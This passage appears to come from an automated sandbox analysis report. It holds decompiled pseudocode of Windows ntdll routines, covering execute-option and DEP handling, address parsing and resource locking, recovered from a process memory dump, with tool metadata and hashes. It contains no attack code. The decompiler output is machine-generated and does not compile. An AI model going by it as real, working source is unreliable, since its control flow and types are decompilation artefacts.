                                                                                                                                                        						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                        						_t77 = _t76 + 0x14;
                                                                                                                                                        						_v552 = _t56;
                                                                                                                                                        						__eflags = _t71 - _t56;
                                                                                                                                                        						if(_t71 >= _t56) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							L10:
                                                                                                                                                        							_t62 = E01F88375(_t71, 0x20);
                                                                                                                                                        							_pop(_t69);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								 *_t62 = 0;
                                                                                                                                                        							}
                                                                                                                                                        							E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                        							_t77 = _t77 + 0x10;
                                                                                                                                                        							E01FEE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(_t62 == 0) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        							_t31 = _t62 + 2; // 0x2
                                                                                                                                                        							_t71 = _t31;
                                                                                                                                                        							__eflags = _t71 - _v552;
                                                                                                                                                        							if(_t71 >= _v552) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                        					_push(3);
                                                                                                                                                        					_push(0x55);
                                                                                                                                                        					E01FC3F92();
                                                                                                                                                        					_t38 = 1;
                                                                                                                                                        					L2:
                                                                                                                                                        					return E01F7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t38 = 0;
                                                                                                                                                        				goto L2;
                                                                                                                                                        			}




























                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01FC3F12
                                                                                                                                                        Strings
                                                                                                                                                        • Execute=1, xrefs: 01FC3F5E
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01FC3F75
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01FCE345
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01FC3EC4
                                                                                                                                                        • ExecuteOptions, xrefs: 01FC3F04
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01FCE2FB
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01FC3F4A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                        • API String ID: 3901378454-484625025
                                                                                                                                                        • Opcode ID: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                        • Instruction ID: 216b5e0af3a9c1fd1a7cc64b7ca217f58f0a1682eac8ad1220b56b6de61a58a6
                                                                                                                                                        • Opcode Fuzzy Hash: d32d481f2c503c823ccc9909e785011fc9a6fa196a47f418a9a8c2af08e5f395
                                                                                                                                                        • Instruction Fuzzy Hash: E641EB71A4031EBADB20EE94DCC5FDA77BCAF14700F4005AEA105E6081EB73DB468BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E01FB0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				void* _t108;
                                                                                                                                                        				void* _t116;
                                                                                                                                                        				char _t120;
                                                                                                                                                        				short _t121;
                                                                                                                                                        				void* _t128;
                                                                                                                                                        				intOrPtr* _t130;
                                                                                                                                                        				char _t132;
                                                                                                                                                        				short _t133;
                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                        				signed int _t156;
                                                                                                                                                        				signed int _t174;
                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                        				intOrPtr* _t179;
                                                                                                                                                        				intOrPtr _t180;
                                                                                                                                                        				void* _t183;
                                                                                                                                                        
                                                                                                                                                        				_t179 = _a4;
                                                                                                                                                        				_t141 =  *_t179;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				if(_t141 == 0) {
                                                                                                                                                        					L41:
                                                                                                                                                        					 *_a8 = _t179;
                                                                                                                                                        					_t180 = _v24;
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_t180 != 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                        					}
                                                                                                                                                        					_t174 = _v32;
                                                                                                                                                        					if(_t174 == 0) {
                                                                                                                                                        						if(_v8 == 7) {
                                                                                                                                                        							goto L43;
                                                                                                                                                        						}
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					L43:
                                                                                                                                                        					if(_v16 != 1) {
                                                                                                                                                        						if(_v16 != 2) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        						L47:
                                                                                                                                                        						if(_t174 != 0) {
                                                                                                                                                        							E01F88980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                        							_t116 = 8;
                                                                                                                                                        							E01F7DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_v12 > 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_t120 = E01FB0CFA(_v28, 0, 0xa);
                                                                                                                                                        						_t183 = _t183 + 0xc;
                                                                                                                                                        						if(_t120 > 0xff) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                        						goto L47;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 > 4) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					_t121 = E01FB0CFA(_v28, _t180, 0x10);
                                                                                                                                                        					_t183 = _t183 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                        					goto L47;
                                                                                                                                                        				} else {
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_t123 = _v16;
                                                                                                                                                        						if(_t123 == 0) {
                                                                                                                                                        							goto L7;
                                                                                                                                                        						}
                                                                                                                                                        						_t108 = _t123 - 1;
                                                                                                                                                        						if(_t108 != 0) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						}
                                                                                                                                                        						_t178 = _t141;
                                                                                                                                                        						if(E01FB06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                        							if(E01FB06BA(_t135, _t178) == 0 || E01FB0A5B(_t136, _t178) == 0) {
                                                                                                                                                        								if(_t141 != 0x3a) {
                                                                                                                                                        									if(_t141 == 0x2e) {
                                                                                                                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										} else {
                                                                                                                                                        											_v24 = _v24 + 1;
                                                                                                                                                        											L27:
                                                                                                                                                        											_v16 = _v16 & 0x00000000;
                                                                                                                                                        											L28:
                                                                                                                                                        											if(_v28 == 0) {
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											_t177 = _v24;
                                                                                                                                                        											if(_t177 != 0) {
                                                                                                                                                        												if(_v12 > 3) {
                                                                                                                                                        													L6:
                                                                                                                                                        													return 0xc000000d;
                                                                                                                                                        												}
                                                                                                                                                        												_t132 = E01FB0CFA(_v28, 0, 0xa);
                                                                                                                                                        												_t183 = _t183 + 0xc;
                                                                                                                                                        												if(_t132 > 0xff) {
                                                                                                                                                        													goto L6;
                                                                                                                                                        												}
                                                                                                                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											if(_v12 > 4) {
                                                                                                                                                        												goto L6;
                                                                                                                                                        											}
                                                                                                                                                        											_t133 = E01FB0CFA(_v28, 0, 0x10);
                                                                                                                                                        											_t183 = _t183 + 0xc;
                                                                                                                                                        											_v20 = _v20 + 1;
                                                                                                                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                        											goto L20;
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t130 = _t179 + 1;
                                                                                                                                                        									if( *_t130 == _t141) {
                                                                                                                                                        										if(_v32 != 0) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										}
                                                                                                                                                        										_v32 = _v8 + 1;
                                                                                                                                                        										_t156 = 2;
                                                                                                                                                        										_v8 = _v8 + _t156;
                                                                                                                                                        										L34:
                                                                                                                                                        										_t179 = _t130;
                                                                                                                                                        										_v16 = _t156;
                                                                                                                                                        										goto L28;
                                                                                                                                                        									}
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									goto L27;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _v12 + 1;
                                                                                                                                                        								if(_v24 > 0) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								goto L20;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							L20:
                                                                                                                                                        							_t179 = _t179 + 1;
                                                                                                                                                        							_t141 =  *_t179;
                                                                                                                                                        							if(_t141 == 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							}
                                                                                                                                                        							continue;
                                                                                                                                                        						}
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t141 == 0x3a) {
                                                                                                                                                        							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t130 = _t179 + 1;
                                                                                                                                                        								if( *_t130 != _t141) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_v20 = _v20 + 1;
                                                                                                                                                        								_t156 = 2;
                                                                                                                                                        								_v32 = 1;
                                                                                                                                                        								_v8 = _t156;
                                                                                                                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        								goto L34;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L8:
                                                                                                                                                        						if(_v8 > 7) {
                                                                                                                                                        							goto L41;
                                                                                                                                                        						}
                                                                                                                                                        						_t142 = _t141;
                                                                                                                                                        						if(E01FB06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                        							if(E01FB06BA(_t124, _t142) == 0 || E01FB0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t128 = 1;
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								_v28 = _t179;
                                                                                                                                                        								_v16 = 1;
                                                                                                                                                        								_v12 = 1;
                                                                                                                                                        								L39:
                                                                                                                                                        								if(_v16 == _t128) {
                                                                                                                                                        									goto L20;
                                                                                                                                                        								}
                                                                                                                                                        								goto L28;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v28 = _t179;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							_v12 = 1;
                                                                                                                                                        							goto L20;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t123 = _t108 == 1;
                                                                                                                                                        				if(_t108 == 1) {
                                                                                                                                                        					goto L8;
                                                                                                                                                        				}
                                                                                                                                                        				_t128 = 1;
                                                                                                                                                        				goto L39;
                                                                                                                                                        			}

























                                                                                                                                                        0x01fb0c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0c60
                                                                                                                                                        0x01fb0afb
                                                                                                                                                        0x01fb0afe
                                                                                                                                                        0x01fb0b02
                                                                                                                                                        0x01fb0b05
                                                                                                                                                        0x01fb0b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0b08
                                                                                                                                                        0x01fb0ae6
                                                                                                                                                        0x01fb0b44
                                                                                                                                                        0x01fb09f8
                                                                                                                                                        0x01fb09f8
                                                                                                                                                        0x01fb09f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fdeaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: d13209b659a9bb27cee30bb6ce9ff40bd52df696b2ff62639c6f4e86e1835237
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: 90A180B1D0070ADADB25CF5AC8856FFBBB9AF05304F28846AF542A7241DF329A41CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E01FB0554(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int* _t49;
                                                                                                                                                        				signed int _t51;
                                                                                                                                                        				signed int _t56;
                                                                                                                                                        				signed int _t58;
                                                                                                                                                        				signed int _t61;
                                                                                                                                                        				signed int _t63;
                                                                                                                                                        				void* _t66;
                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				signed int _t70;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				signed int _t81;
                                                                                                                                                        				signed int _t84;
                                                                                                                                                        				void* _t86;
                                                                                                                                                        				signed int _t93;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                        				signed int _t107;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				signed int _t115;
                                                                                                                                                        				signed int* _t119;
                                                                                                                                                        				void* _t125;
                                                                                                                                                        				void* _t126;
                                                                                                                                                        				signed int _t128;
                                                                                                                                                        				signed int _t130;
                                                                                                                                                        				signed int _t138;
                                                                                                                                                        				signed int _t144;
                                                                                                                                                        				void* _t158;
                                                                                                                                                        				void* _t159;
                                                                                                                                                        				void* _t160;
                                                                                                                                                        
                                                                                                                                                        				_t96 = _a4;
                                                                                                                                                        				_t115 =  *(_t96 + 0x28);
                                                                                                                                                        				_push(_t138);
                                                                                                                                                        				if(_t115 < 0) {
                                                                                                                                                        					_t105 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t115 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [eax], edx");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L6:
                                                                                                                                                        					_push(_t128);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L7:
                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                        						if(_t115 >= 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t49 = _t96 + 0x1c;
                                                                                                                                                        							_t106 = 1;
                                                                                                                                                        							asm("lock xadd [edx], ecx");
                                                                                                                                                        							_t115 =  *(_t96 + 0x28);
                                                                                                                                                        							__eflags = _t115;
                                                                                                                                                        							if(_t115 < 0) {
                                                                                                                                                        								L23:
                                                                                                                                                        								_t130 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
                                                                                                                                                        									_push(_t144);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t51 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                        									__eflags = _t51 - 0x102;
                                                                                                                                                        									if(_t51 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t106 =  *(_t144 + 4);
                                                                                                                                                        									_t126 =  *_t144;
                                                                                                                                                        									_t86 = E01FB4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t126);
                                                                                                                                                        									_push(_t86);
                                                                                                                                                        									E01FC3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                        									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                        									_t130 = _t130 + 1;
                                                                                                                                                        									_t160 = _t158 + 0x28;
                                                                                                                                                        									__eflags = _t130 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E01FF217A(_t106, __eflags, _t96);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E01FC3F92();
                                                                                                                                                        									_t158 = _t160 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t51;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E01FB3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									while(1) {
                                                                                                                                                        										L32:
                                                                                                                                                        										__eflags = _a8;
                                                                                                                                                        										if(_a8 == 0) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        										_t119 = _t96 + 0x24;
                                                                                                                                                        										_t107 = 1;
                                                                                                                                                        										asm("lock xadd [eax], ecx");
                                                                                                                                                        										_t56 =  *(_t96 + 0x28);
                                                                                                                                                        										_a4 = _t56;
                                                                                                                                                        										__eflags = _t56;
                                                                                                                                                        										if(_t56 != 0) {
                                                                                                                                                        											L40:
                                                                                                                                                        											_t128 = 0;
                                                                                                                                                        											__eflags = 0;
                                                                                                                                                        											while(1) {
                                                                                                                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        												asm("sbb esi, esi");
                                                                                                                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
                                                                                                                                                        												_push(_t138);
                                                                                                                                                        												_push(0);
                                                                                                                                                        												_t58 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                        												__eflags = _t58 - 0x102;
                                                                                                                                                        												if(_t58 != 0x102) {
                                                                                                                                                        													break;
                                                                                                                                                        												}
                                                                                                                                                        												_t107 =  *(_t138 + 4);
                                                                                                                                                        												_t125 =  *_t138;
                                                                                                                                                        												_t75 = E01FB4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                        												_push(_t125);
                                                                                                                                                        												_push(_t75);
                                                                                                                                                        												E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                        												E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                        												_t128 = _t128 + 1;
                                                                                                                                                        												_t159 = _t158 + 0x28;
                                                                                                                                                        												__eflags = _t128 - 2;
                                                                                                                                                        												if(__eflags > 0) {
                                                                                                                                                        													E01FF217A(_t107, __eflags, _t96);
                                                                                                                                                        												}
                                                                                                                                                        												_push("RTL: Re-Waiting\n");
                                                                                                                                                        												_push(0);
                                                                                                                                                        												_push(0x65);
                                                                                                                                                        												E01FC3F92();
                                                                                                                                                        												_t158 = _t159 + 0xc;
                                                                                                                                                        											}
                                                                                                                                                        											__eflags = _t58;
                                                                                                                                                        											if(__eflags < 0) {
                                                                                                                                                        												_push(_t58);
                                                                                                                                                        												E01FB3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                        												asm("int3");
                                                                                                                                                        												_t61 =  *_t107;
                                                                                                                                                        												 *_t107 = 0;
                                                                                                                                                        												__eflags = _t61;
                                                                                                                                                        												if(_t61 == 0) {
                                                                                                                                                        													L1:
                                                                                                                                                        													_t63 = E01F95384(_t138 + 0x24);
                                                                                                                                                        													if(_t63 != 0) {
                                                                                                                                                        														goto L52;
                                                                                                                                                        													} else {
                                                                                                                                                        														goto L2;
                                                                                                                                                        													}
                                                                                                                                                        												} else {
                                                                                                                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                        													_push( &_a4);
                                                                                                                                                        													_push(_t61);
                                                                                                                                                        													_t70 = E01F6F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                        													__eflags = _t70;
                                                                                                                                                        													if(__eflags >= 0) {
                                                                                                                                                        														goto L1;
                                                                                                                                                        													} else {
                                                                                                                                                        														_push(_t70);
                                                                                                                                                        														E01FB3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                        														L52:
                                                                                                                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                        														_push( &_a4);
                                                                                                                                                        														_push(1);
                                                                                                                                                        														_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                        														__eflags = _t63;
                                                                                                                                                        														if(__eflags >= 0) {
                                                                                                                                                        															L2:
                                                                                                                                                        															return _t63;
                                                                                                                                                        														} else {
                                                                                                                                                        															_push(_t63);
                                                                                                                                                        															E01FB3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                        															_push( &_a4);
                                                                                                                                                        															_push(1);
                                                                                                                                                        															_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                        															__eflags = _t63;
                                                                                                                                                        															if(__eflags >= 0) {
                                                                                                                                                        																goto L2;
                                                                                                                                                        															} else {
                                                                                                                                                        																_push(_t63);
                                                                                                                                                        																_t66 = E01FB3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                        																asm("int3");
                                                                                                                                                        																while(1) {
                                                                                                                                                        																	_t110 = _t66;
                                                                                                                                                        																	__eflags = _t66 - 1;
                                                                                                                                                        																	if(_t66 != 1) {
                                                                                                                                                        																		break;
                                                                                                                                                        																	}
                                                                                                                                                        																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                        																	_t66 = _t110;
                                                                                                                                                        																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        																	__eflags = _t66 - _t110;
                                                                                                                                                        																	if(_t66 != _t110) {
                                                                                                                                                        																		continue;
                                                                                                                                                        																	} else {
                                                                                                                                                        																		_t67 =  *[fs:0x18];
                                                                                                                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                        																		return _t67;
                                                                                                                                                        																	}
                                                                                                                                                        																	goto L59;
                                                                                                                                                        																}
                                                                                                                                                        																E01F95329(_t110, _t138);
                                                                                                                                                        																_t69 = E01F953A5(_t138, 1);
                                                                                                                                                        																return _t69;
                                                                                                                                                        															}
                                                                                                                                                        														}
                                                                                                                                                        													}
                                                                                                                                                        												}
                                                                                                                                                        											} else {
                                                                                                                                                        												_t56 =  *(_t96 + 0x28);
                                                                                                                                                        												goto L3;
                                                                                                                                                        											}
                                                                                                                                                        										} else {
                                                                                                                                                        											_t107 =  *_t119;
                                                                                                                                                        											__eflags = _t107;
                                                                                                                                                        											if(__eflags > 0) {
                                                                                                                                                        												while(1) {
                                                                                                                                                        													_t81 = _t107;
                                                                                                                                                        													asm("lock cmpxchg [edi], esi");
                                                                                                                                                        													__eflags = _t81 - _t107;
                                                                                                                                                        													if(_t81 == _t107) {
                                                                                                                                                        														break;
                                                                                                                                                        													}
                                                                                                                                                        													_t107 = _t81;
                                                                                                                                                        													__eflags = _t81;
                                                                                                                                                        													if(_t81 > 0) {
                                                                                                                                                        														continue;
                                                                                                                                                        													}
                                                                                                                                                        													break;
                                                                                                                                                        												}
                                                                                                                                                        												_t56 = _a4;
                                                                                                                                                        												__eflags = _t107;
                                                                                                                                                        											}
                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                        												while(1) {
                                                                                                                                                        													L3:
                                                                                                                                                        													__eflags = _t56;
                                                                                                                                                        													if(_t56 != 0) {
                                                                                                                                                        														goto L32;
                                                                                                                                                        													}
                                                                                                                                                        													_t107 = _t107 | 0xffffffff;
                                                                                                                                                        													_t56 = 0;
                                                                                                                                                        													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        													__eflags = 0;
                                                                                                                                                        													if(0 != 0) {
                                                                                                                                                        														continue;
                                                                                                                                                        													} else {
                                                                                                                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        														return 1;
                                                                                                                                                        													}
                                                                                                                                                        													goto L59;
                                                                                                                                                        												}
                                                                                                                                                        												continue;
                                                                                                                                                        											} else {
                                                                                                                                                        												goto L40;
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        										goto L59;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = 0;
